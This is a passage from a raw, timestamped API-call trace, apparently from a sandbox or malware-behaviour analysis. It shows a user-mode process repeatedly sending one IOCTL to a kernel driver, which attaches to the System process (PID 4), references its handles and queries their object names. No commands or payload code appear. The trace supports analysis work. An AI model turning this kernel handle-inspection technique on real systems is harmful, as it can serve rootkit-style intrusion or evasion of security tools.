lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.433] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.433] PsAcquireProcessExitSynchronization () returned 0x0 [0240.433] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.434] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800372f880, HandleInformation=0x0) returned 0x0 [0240.434] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.434] PsReleaseProcessExitSynchronization () returned 0x2 [0240.434] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.434] ObQueryNameString (in: Object=0xfffffa800372f880, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.434] ObfDereferenceObject (Object=0xfffffa800372f880) returned 0x1 [0240.434] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.434] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.434] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.434] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.434] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.434] PsAcquireProcessExitSynchronization () returned 0x0 [0240.434] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.434] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037328b0, HandleInformation=0x0) returned 0x0 [0240.434] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.434] PsReleaseProcessExitSynchronization () returned 0x2 [0240.434] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.434] ObQueryNameString (in: Object=0xfffffa80037328b0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.434] ObfDereferenceObject (Object=0xfffffa80037328b0) returned 0x2 [0240.434] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.434] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.434] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.435] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.435] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.435] PsAcquireProcessExitSynchronization () returned 0x0 [0240.435] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.435] ObReferenceObjectByHandle (in: Handle=0xffffffff80000320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed4a90, HandleInformation=0x0) returned 0x0 [0240.435] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.435] PsReleaseProcessExitSynchronization () returned 0x2 [0240.435] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.435] ObQueryNameString (in: Object=0xfffffa8001ed4a90, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.435] ObfDereferenceObject (Object=0xfffffa8001ed4a90) returned 0x2 [0240.435] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.435] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.435] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.435] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0240.435] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.435] PsAcquireProcessExitSynchronization () returned 0x0 [0240.435] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.435] ObReferenceObjectByHandle (in: Handle=0xffffffff80000324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037598a0, HandleInformation=0x0) returned 0x0 [0240.435] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.435] PsReleaseProcessExitSynchronization () returned 0x2 [0240.435] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.435] ObQueryNameString (in: Object=0xfffffa80037598a0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.435] ObfDereferenceObject (Object=0xfffffa80037598a0) returned 0x2 [0240.435] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.436] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.436] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.436] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0240.436] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.436] PsAcquireProcessExitSynchronization () returned 0x0 [0240.436] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.436] ObReferenceObjectByHandle (in: Handle=0xffffffff80000328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800374f9b0, HandleInformation=0x0) returned 0x0 [0240.436] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.436] PsReleaseProcessExitSynchronization () returned 0x2 [0240.436] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.436] ObQueryNameString (in: Object=0xfffffa800374f9b0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.436] ObfDereferenceObject (Object=0xfffffa800374f9b0) returned 0x1 [0240.436] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.436] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.436] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.436] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0240.436] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.436] PsAcquireProcessExitSynchronization () returned 0x0 [0240.436] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.436] ObReferenceObjectByHandle (in: Handle=0xffffffff8000032c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003756f20, HandleInformation=0x0) returned 0x0 [0240.436] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.436] PsReleaseProcessExitSynchronization () returned 0x2 [0240.436] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.437] ObQueryNameString (in: Object=0xfffffa8003756f20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.437] ObfDereferenceObject (Object=0xfffffa8003756f20) returned 0x1 [0240.437] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.437] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.437] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0240.437] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.437] PsAcquireProcessExitSynchronization () returned 0x0 [0240.437] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.437] ObReferenceObjectByHandle (in: Handle=0xffffffff80000330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003756d50, HandleInformation=0x0) returned 0x0 [0240.437] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.437] PsReleaseProcessExitSynchronization () returned 0x2 [0240.437] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.437] ObQueryNameString (in: Object=0xfffffa8003756d50, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.437] ObfDereferenceObject (Object=0xfffffa8003756d50) returned 0x1 [0240.437] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.437] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.437] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0240.437] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.437] PsAcquireProcessExitSynchronization () returned 0x0 [0240.437] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.437] ObReferenceObjectByHandle (in: Handle=0xffffffff80000334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375a940, HandleInformation=0x0) returned 0x0 [0240.437] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.438] PsReleaseProcessExitSynchronization () returned 0x2 [0240.438] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.438] ObQueryNameString (in: Object=0xfffffa800375a940, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.438] ObfDereferenceObject (Object=0xfffffa800375a940) returned 0x2 [0240.438] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.438] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0240.438] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.438] PsAcquireProcessExitSynchronization () returned 0x0 [0240.438] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.438] ObReferenceObjectByHandle (in: Handle=0xffffffff80000338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375ba90, HandleInformation=0x0) returned 0x0 [0240.438] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.438] PsReleaseProcessExitSynchronization () returned 0x2 [0240.438] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.438] ObQueryNameString (in: Object=0xfffffa800375ba90, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.438] ObfDereferenceObject (Object=0xfffffa800375ba90) returned 0x2 [0240.438] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.438] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.438] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.438] PsAcquireProcessExitSynchronization () returned 0x0 [0240.439] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.439] ObReferenceObjectByHandle (in: Handle=0xffffffff80000340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375b940, HandleInformation=0x0) returned 0x0 [0240.439] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.439] PsReleaseProcessExitSynchronization () returned 0x2 [0240.439] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.439] ObQueryNameString (in: Object=0xfffffa800375b940, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.439] ObfDereferenceObject (Object=0xfffffa800375b940) returned 0x1 [0240.439] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.439] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.439] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.439] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.439] PsAcquireProcessExitSynchronization () returned 0x0 [0240.439] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.439] ObReferenceObjectByHandle (in: Handle=0xffffffff80000344, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800375c980, HandleInformation=0x0) returned 0x0 [0240.439] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.439] PsReleaseProcessExitSynchronization () returned 0x2 [0240.439] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.439] ObQueryNameString (in: Object=0xfffffa800375c980, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.439] ObfDereferenceObject (Object=0xfffffa800375c980) returned 0x2 [0240.439] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.439] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0240.440] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.440] PsAcquireProcessExitSynchronization () returned 0x0 [0240.440] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.440] ObReferenceObjectByHandle (in: Handle=0xffffffff80000388, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800386ba30, HandleInformation=0x0) returned 0x0 [0240.440] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.440] PsReleaseProcessExitSynchronization () returned 0x2 [0240.440] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.440] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.440] ObfDereferenceObject (Object=0xfffffa800386ba30) returned 0x1 [0240.440] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.440] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.440] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0240.440] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.440] PsAcquireProcessExitSynchronization () returned 0x0 [0240.440] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.440] ObReferenceObjectByHandle (in: Handle=0xffffffff8000038c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800386ebf0, HandleInformation=0x0) returned 0x0 [0240.440] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.440] PsReleaseProcessExitSynchronization () returned 0x2 [0240.440] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.440] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.441] ObfDereferenceObject (Object=0xfffffa800386ebf0) returned 0x1 [0240.441] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.441] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.441] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.441] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0240.441] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.441] PsAcquireProcessExitSynchronization () returned 0x0 [0240.441] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.441] ObReferenceObjectByHandle (in: Handle=0xffffffff80000390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800386e890, HandleInformation=0x0) returned 0x0 [0240.441] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.441] PsReleaseProcessExitSynchronization () returned 0x2 [0240.441] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.441] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.441] ObfDereferenceObject (Object=0xfffffa800386e890) returned 0x1 [0240.441] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.441] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.441] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.441] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0240.441] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.441] PsAcquireProcessExitSynchronization () returned 0x0 [0240.441] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.441] ObReferenceObjectByHandle (in: Handle=0xffffffff80000394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003867f20, HandleInformation=0x0) returned 0x0 [0240.441] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.441] PsReleaseProcessExitSynchronization () returned 0x2 [0240.441] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.441] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.442] ObfDereferenceObject (Object=0xfffffa8003867f20) returned 0x4 [0240.442] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.442] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.442] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0240.442] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.442] PsAcquireProcessExitSynchronization () returned 0x0 [0240.442] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, 